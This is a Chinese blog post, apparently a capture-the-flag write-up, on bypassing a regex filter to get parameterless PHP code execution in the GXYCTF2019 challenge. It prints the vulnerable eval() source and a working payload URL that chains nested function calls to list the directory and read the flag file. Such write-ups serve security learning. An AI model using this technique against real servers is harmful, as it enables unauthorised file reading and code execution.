初探rce中的无参数rce

已于 2024-03-18 21:10:37 修改
阅读量1k 收藏 11
点赞数 27
文章标签: web安全
于 2024-03-09 21:54:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79359652/article/details/136591912
版权

无参数rce

源码中过滤了常用伪协议,用正则表达式规定只可以使用无参数函数进行RCE

对/\w+\ ((?R)? \ )/的理解

(?R)是引用当前表达式的意思

(?R)? 这里多一个?表示可以有引用,也可以没有。

可以用\w+((?R)?)替换到(?R)的位置,因此可以衍生成匹配\w+\ (\w+((?R)?\ ))、\w+(\w+(\w+((?R)?\ )\ )\ )等等。

特征:

 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) {    
     eval($_GET['exp']);
 }

解决方法是, 使用函数套娃的形式,来逐层实现我们RCE的命令.

需要了解相关函数

粘贴大佬整理:

scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换) localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大) current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西 getcwd() :取得当前工作目录 dirname():函数返回路径中的目录部分 array_flip() :交换数组中的键和值,成功时返回交换后的数组 array_rand() :从数组中随机取出一个或多个单元

array_reverse():将数组内容反转

strrev():用于反转给定字符串

getcwd():获取当前工作目录路径

dirname() :函数返回路径中的目录部分。 chdir() :函数改变当前的目录。

var_dump() 函数用于输出变量的相关信息

eval()、assert():命令执行

hightlight_file()、show_source()、readfile():读取文件内容

eg:current(localeconv())就能构造一个‘.’

数组移位操作

粘贴大佬整理:

end() : 将内部指针指向数组中的最后一个元素,并输出 next() :将内部指针指向数组中的下一个元素,并输出 prev() :将内部指针指向数组中的上一个元素,并输出 reset() : 将内部指针指向数组中的第一个元素,并输出 each() : 返回当前元素的键名和键值,并将内部指针向前移动

[GXYCTF2019]禁止套娃 无参数rce

php正则表达式

(描述了一种字符串匹配的模式,可以用来检查一个串是否含有某种子串、将匹配的子串做替换或者从某个串中取出符合某个条件的子串等。)

  • preg_match(): 在字符串中搜索匹配的模式,只返回第一个匹配项。

  • preg_match_all(): 在字符串中搜索匹配的模式,返回所有匹配项。

  • preg_replace(): 在字符串中搜索匹配的模式,然后进行替换。

wp

首先使用dirsearch扫目录发现这种情况,那么可能是.git泄露,想到使用githack扫,

经过扫描找到了源码

如下:该网站使用了正则匹配 其实这就是无参数的rce

 <?php
 include "flag.php";
 //——包含了一个名为flag.php的外部文件
 echo "flag在哪里呢?<br>";
 if(isset($_GET['exp'])){
 //——确认是否有一个exp参数
     if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
 //——检查exp参数的值是否不包含 data://、filter://、php:// 和 phar://
         if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
 //——检查所有函数调用都不能存在,仅剩余一个";"
 //——也可以看出此题为无参数rce
             if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
 //——再次检查不能剩余上面这些字符
                 // echo $_GET['exp'];
                 @eval($_GET['exp']);
             }
             else{
                 die("还差一点哦!");
             }
         }
         else{
             die("再好好想想!");
         }
     }
     else{
         die("还想读flag,臭弟弟!");
     }
 }
 // highlight_file(__FILE__);
 //——该行代码如果取消注释将高亮显示当前文件源代码
 ?>
     
  可以看出它的主要功能是处理一个名为exp的GET请求参数,根据参数值进行一些参数

  1. var_dump(localeconv());我们能看见第一个string[1]就是一个“.”,这个点是由localeconv()产生的

  2. 利用current()函数将这个点取出来的,‘.’代表的是当前目录,那接下来就很好理解了,我们可以利用这个点完成遍历目录的操作,相当于就是linux中的ls指令

  3. scandir('.') 返回当前目录中的文件和子目录

    发现flag在倒数第二个数组

  4. 通过array_reverse()将数组内容反转,让它从倒数第二的位置变成正数第二

  5. next()找到flag

  6. 用highlight_file()返回文件内容

 http://3779fe37-75b4-40c4-8931-8d282173aa3c.node5.buuoj.cn:81/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

止kk
关注
  • 27
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
初探参数RCE
weixin_46330722的博客
12-07 2663
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
74CMS的RCE挖掘思路
include_voidmain的博客
04-06 2718
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包的referer并没有进行过滤,并且将referer的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
参数RCE知识点
m0_75178803的博客
12-12 635
无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果。
初学无参数RCE
m0_62709637的博客
05-12 512
前置知识: 1、文件读取函数: show_source(): highlight_file():对文件进行语法高亮显示; readfile(): file_get_contents(): file(): tips:show_source()和highlight_file()函数无法直接在页面输出需要配合echo()等函数一同使用; 2、写题时常用的输出函数: print_r(): var_dump(): echo(): 3、无参数rce常见正则匹配 1、'/[^\W]+\((?R)?\
最新CS RCE(CVE-2022-39197)复现心得分享
C20220511的博客
10-18 2597
这个漏洞号称是脚本小子杀手,喜欢用CS的朋友们瑟瑟发抖。复现这个漏洞也是一个很有意思的事情,让我学到了很多关于Swing和SVG的知识,这篇文章也希望能帮助大家对此类漏洞的调试、复现等过程有更深入的理解。
Struts2 RCE 漏洞初探
small_whitehat的博客
03-03 482
Struts2 RCE 漏洞初探
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1431
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
萌新框架漏洞初探-thinkphp RCE
small_whitehat的博客
03-01 246
萌新框架漏洞初探-thinkphp RCE
JAVA反序列化初探
2301_79323180的博客
04-28 315
Java序列化机制是基于对象的类结构进行的。当一个对象需要被序列化时,Java会将其转换为字节流,包括对象的数据和类的信息。其实这个和上面相当于相反的过程,这里使用数据返回类型是object类所以我们只需要知道objectInputStream是读取序列化后的字节流。反序列化是将字节流转换回对象的过程。在反序列化过程,Java会使用字节流的信息重构对象,并将其重新加载到内存。Java 反序列化是指把字节序列恢复为 Java 对象的过程。的原因其实就是这里返回的数据最好是字节流,才能更好的存储。
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
向日葵RCE漏洞一键批量自己检测工具
02-25
然而,向日葵RCE漏洞是指向日葵软件存在的特定远程代码执行漏洞,这可能导致恶意用户利用该漏洞对受影响的系统进行攻击。 描述的“测试自己向日葵是否存在RCE漏洞”意味着存在一种工具,能够帮助用户快速检查...
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
【网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 776
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 380
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在国的落地。、简化已有的网络战略的具体实践,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全那些梗
最新发布
weixin_73442302的博客
07-12 655
例如,“网络购物”本可以直接称为“购物”,“网络安全”则强调了安全概念在网络环境的应用。:在注册网站时,网络安全界的人有时会采用“真电话+假名字”的方式填写个人信息,以应对可能的骚扰电话。一些笑话,网络安全从业人员被误解为黑客,被亲戚朋友请求帮忙破解WiFi密码、盗取QQ号等,这实际上是对网络安全工程师工作的误解。:这个梗源自一个笑话,讲述了一位程序员因误解妻子的话而只买了一个包子回家,随后被领导提醒要进行安全检查扫描,程序员戏称“让网络彻底安全的最有效方法竟然是关掉服务器”。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1187
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
fastjson rce
09-16
在Fastjson版本1.2.24及以下的版本,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的考虑不够周全,导致攻击者可以通过构造恶意的JSON数据来执行任意的Java代码,从而实现远程代码执行。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值